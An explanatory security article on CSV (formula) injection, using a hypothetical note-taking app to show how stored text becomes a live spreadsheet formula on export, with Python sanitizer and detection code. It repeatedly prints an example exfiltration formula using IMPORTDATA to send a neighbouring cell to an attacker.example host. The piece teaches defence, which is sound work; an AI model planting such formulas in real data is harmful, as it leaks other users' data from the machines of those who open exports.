CSV injection is a bug where attacker controlled text saved by your app turns into a live spreadsheet formula the moment someone exports the data and opens it. It is also called formula injection. The app itself looks fine and behaves correctly, which is exactly why this class of issue is so easy to miss.
What is CSV injection (formula injection)?
Spreadsheet programs treat a cell as a formula when its first character is =, +, -, or @. They do this for any file, including a plain CSV that your application generated. So if a user can store a value that starts with one of those characters, and that value later lands in an exported CSV, the spreadsheet will evaluate it as a formula on the machine of whoever opens the file.
The key idea is that the danger does not live in your web app at all. Your pages render the value as harmless text. The danger appears later, in a different program, on a different machine, after the data leaves your system. That gap between where the data is stored and where it is interpreted is the whole bug.
The vulnerability is not in the value. It is in the moment a CSV cell stops being text and starts being a formula.
A concrete example on Acme Notes
Imagine a note taking app called Acme Notes. Users can set a display name. The app shows that name on the dashboard and never lets it break the page, so on the web it is perfectly safe.
A user signs up and sets their display name to a value crafted to behave as a formula:
Display name: =IMPORTDATA("https://attacker.example/x?d="&A2)
On the website this is just a weird string. It sits in the database. It renders as plain text in the user list. Nothing fires.
Now an admin opens the internal users page and clicks Export to CSV. The export writes one row per user, and the display name column contains that exact string. The admin double clicks the downloaded file and the spreadsheet opens it. The first character is =, so the cell is evaluated. Two outcomes are common:
- Data exfiltration via web requests. Functions like IMPORTDATA or WEBSERVICE can fetch a URL as soon as the cell is evaluated, and HYPERLINK can plant a link that sends data when someone clicks it. The attacker concatenates the contents of a neighboring cell into that URL, so the spreadsheet quietly sends another user’s email or token to a server the attacker controls.
- Command execution via legacy DDE. Older spreadsheet setups support Dynamic Data Exchange, where a cell starting with = can launch an external program. At a high level, a crafted cell asks the spreadsheet to start a process on the admin machine. Modern versions warn or block this, but legacy and misconfigured installs still run it.
The person who gets hit is not the attacker. It is the admin who trusted an export from their own product. That is what makes formula injection worth taking seriously.
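To make the export step concrete, here is a minimal sketch of a naive export. The `export_users` helper and the hard-coded `USERS` list are hypothetical stand-ins, not Acme Notes code. The point it illustrates is that standard CSV quoting keeps the file well formed but leaves the leading = exactly where the attacker put it.

```python
import csv
import io

# Hypothetical rows standing in for the users table.
USERS = [
    {"email": "alice@example.com", "display_name": "Alice"},
    {
        "email": "mallory@example.com",
        "display_name": '=IMPORTDATA("https://attacker.example/x?d="&A2)',
    },
]


def export_users(users):
    """Naive export: writes stored values straight into the CSV."""
    buffer = io.StringIO()
    writer = csv.writer(buffer)
    writer.writerow(["email", "display_name"])
    for user in users:
        writer.writerow([user["email"], user["display_name"]])
    return buffer.getvalue()


csv_text = export_users(USERS)

# Parse the file back into cells, roughly as a spreadsheet would.
cells = [row[1] for row in csv.reader(io.StringIO(csv_text))]
print(repr(cells[2][0]))  # first character of the attacker's cell
```

The CSV writer doubles the embedded quotes so the row parses cleanly, yet the parsed cell still begins with =. Quoting protects the file structure, not the person opening it.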
Why this is an output encoding problem
It helps to name the real defect. This is an output encoding bug, the same family as cross site scripting, just aimed at a spreadsheet instead of a browser. Your app accepted text and stored it correctly. The mistake happens when you write that text into a CSV without encoding it for the program that will read it.
A browser interprets <script>. A spreadsheet interprets a leading =. In both cases the fix is the same shape: encode data for the context it is about to enter. A CSV opened in Excel or Google Sheets is an executable context, so it needs its own escaping.
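A short sketch of that idea, with two hypothetical helpers (`encode_for_html` and `encode_for_csv_cell` are illustrative names, not part of any framework): the same stored value gets a different encoding depending on where it is headed, and the HTML encoding does nothing for the spreadsheet case.

```python
import html


def encode_for_html(value):
    """Escape for an HTML context: neutralizes markup such as <script>."""
    return html.escape(str(value))


def encode_for_csv_cell(value):
    """Guard for a spreadsheet context: neutralizes a leading formula trigger."""
    text = str(value)
    if text.startswith(("=", "+", "-", "@")):
        return "'" + text
    return text


payload = "=1+1<script>alert(1)</script>"

html_safe = encode_for_html(payload)
csv_safe = encode_for_csv_cell(payload)

print(html_safe)  # markup is escaped, but the value still starts with "="
print(csv_safe)   # leading "=" is guarded, markup is left untouched
```

Neither encoder is a substitute for the other, which is why a value that is safe on the dashboard can still be live in the export.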
Why scanners often miss it
Most automated scanners poke the live application and read the response. They look at rendered pages and API replies. By that measure Acme Notes passes. The stored name is escaped in HTML, there is no error, no reflected payload, no broken markup. The dangerous behavior only shows up after an export, in a separate program, triggered by a human action the scanner never performs. A pattern matcher that only watches HTTP responses has nothing to flag.
The fix in code
The reliable fix is at export time, because that is the context where the value becomes dangerous. When you build each CSV cell, neutralize any value that starts with a formula trigger. The common approach is to prefix risky cells with a single quote, or to escape the leading character so the spreadsheet treats the cell as text.
Dangerous cell written straight to the CSV:
=IMPORTDATA("https://attacker.example/x?d="&A2)
Safe cell after sanitizing on export:
'=IMPORTDATA("https://attacker.example/x?d="&A2)
Sanitizer applied to every exported field:
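def safe_csv_field(value):
    """Return value as text, guarded so a spreadsheet will not evaluate it."""
    text = str(value)
    # A leading =, +, -, @, tab, or carriage return can trigger formula parsing.
    if text and text[0] in ('=', '+', '-', '@', '\t', '\r'):
        return "'" + text
    return text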
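As a usage sketch, the sanitizer can be applied to every cell while the rows are written. The `export_rows` helper and the sample rows below are assumptions for illustration; the sanitizer is repeated so the example runs on its own.

```python
import csv
import io

FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def safe_csv_field(value):
    """Prefix a single quote when the text starts with a formula trigger."""
    text = str(value)
    if text and text[0] in FORMULA_TRIGGERS:
        return "'" + text
    return text


def export_rows(rows):
    """Write rows to CSV text, guarding every cell on the way out."""
    buffer = io.StringIO()
    writer = csv.writer(buffer)
    for row in rows:
        writer.writerow([safe_csv_field(cell) for cell in row])
    return buffer.getvalue()


rows = [
    ["email", "display_name"],
    ["alice@example.com", "Alice"],
    ["mallory@example.com", "=1+1"],
]
print(export_rows(rows))
```

One trade-off to be aware of: because the check looks only at the first character, a legitimate negative number such as -5 is prefixed too. Whether to exempt numeric columns is a judgment call for each export.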
Three layers work together:
- Escape on export. Prefix any cell starting with =, +, -, @, a tab, or a carriage return with a single quote. This is the load bearing fix and it covers every field.
- Validate on input where it fits. If a field has no business starting with a formula character, such as a display name or a phone number, reject or clean it when it is saved. Treat this as defense in depth, not your only control.
- Set a safe export format. Quote every field, write a UTF-8 byte order mark, and prefer a format that does not auto evaluate. Document that exports are data, not trusted spreadsheets.
One caution. Prefixing with a single quote changes the displayed value slightly, so apply it during CSV generation rather than mutating the stored record. The database should keep the real value, and only the exported copy gets the guard.
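The layers above might fit together roughly like this. It is a sketch under stated assumptions: `validate_display_name`, `guard`, and `export_csv_bytes` are hypothetical names, and rejecting a display name outright is only one possible input policy. The stored rows are never modified; the guard is applied to the exported copy alone.

```python
import csv
import io

FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def validate_display_name(name):
    """Input layer (hypothetical policy): reject names starting with a trigger."""
    if name.startswith(FORMULA_TRIGGERS):
        raise ValueError("display name may not start with a formula character")
    return name


def guard(value):
    """Export layer: prefix a single quote on cells starting with a trigger."""
    text = str(value)
    return "'" + text if text.startswith(FORMULA_TRIGGERS) else text


def export_csv_bytes(rows):
    """Guard every cell, quote every field, and prepend a UTF-8 BOM."""
    buffer = io.StringIO(newline="")
    writer = csv.writer(buffer, quoting=csv.QUOTE_ALL)
    for row in rows:
        writer.writerow([guard(cell) for cell in row])
    # The "utf-8-sig" codec writes the byte order mark before the data.
    return buffer.getvalue().encode("utf-8-sig")


stored_rows = [["display_name"], ["=1+1"]]
data = export_csv_bytes(stored_rows)
print(data)
print(stored_rows)  # the stored value is unchanged
```

Keeping the guard inside the export function means a new export path only has to call one helper to get all the protections.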
How to detect it
You can find this yourself without any special tooling:
- List every field a user can control: names, descriptions, notes, addresses, support messages.
- Set one of those fields to a benign probe like =1+1 or =HYPERLINK("https://example.com","click").
- Trigger every export path in the product, then open the file in a real spreadsheet and watch for a cell that evaluates instead of showing the literal text.
- Check email reports and scheduled exports too, since those reach people who never see the app.
If =1+1 shows up as 2, the field is injectable and your export needs the guard above.
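If you want a quick pre-check before opening files by hand, a small script can flag cells in an exported CSV that still start with a trigger character. This is a sketch: `find_risky_cells` is a hypothetical helper and the sample text stands in for a real export. It complements the manual test and does not replace it, since only a real spreadsheet shows what actually evaluates.

```python
import csv
import io

FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def find_risky_cells(csv_text):
    """Return (row, column, value) for every cell starting with a trigger."""
    findings = []
    reader = csv.reader(io.StringIO(csv_text, newline=""))
    for row_index, row in enumerate(reader, start=1):
        for col_index, cell in enumerate(row, start=1):
            if cell.startswith(FORMULA_TRIGGERS):
                findings.append((row_index, col_index, cell))
    return findings


unguarded = "email,display_name\r\nmallory@example.com,=1+1\r\n"
guarded = "email,display_name\r\nmallory@example.com,'=1+1\r\n"

print(find_risky_cells(unguarded))
print(find_risky_cells(guarded))
```

Row and column numbers are 1-based so they line up with what a spreadsheet displays. Expect some noise from legitimate values such as negative numbers, which also start with a trigger character.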
Where this fits in finding bugs
Formula injection is a clean example of a flaw you only see when you understand how the data flows, from a user form to a stored record to an export to a spreadsheet on someone else’s machine. A checklist of known payloads against the live page will say everything is fine. This is the kind of assumption gap that an autonomous researcher is built to find, because it tests how an app is actually used rather than matching patterns. For more on input handling bugs, see our injection and input category, and you can read what we are building on the about page.
Frequently asked questions
Is CSV injection the same as formula injection?
Yes, the two names describe the same bug. Attacker controlled text saved by your app becomes a live spreadsheet formula the moment someone exports the data and opens it in a program like Excel or Google Sheets. The trigger is a cell whose first character is =, +, -, or @.
Why do web vulnerability scanners usually miss CSV injection?
Most scanners poke the live application and read the HTTP response, where the stored value renders as harmless escaped text. The dangerous behavior only appears later, in a separate spreadsheet program, after a human triggers an export and opens the file. A pattern matcher that only watches responses has nothing to flag.
How do you fix CSV injection without breaking stored data?
Sanitize at export time, not in the database. When you build each CSV cell, prefix any value that starts with =, +, -, @, a tab, or a carriage return with a single quote so the spreadsheet reads it as text. Keep the real value in the database and apply the guard only to the exported copy. OWASP describes the same approach in its CSV Injection guide.
Who actually gets harmed by a CSV injection bug?
Usually not the attacker but the person who opens the export, often an admin who trusted a file from their own product. A formula like one using IMPORTDATA can quietly send a neighboring cell, such as another user’s email or token, to a server the attacker controls, all on the admin’s machine.
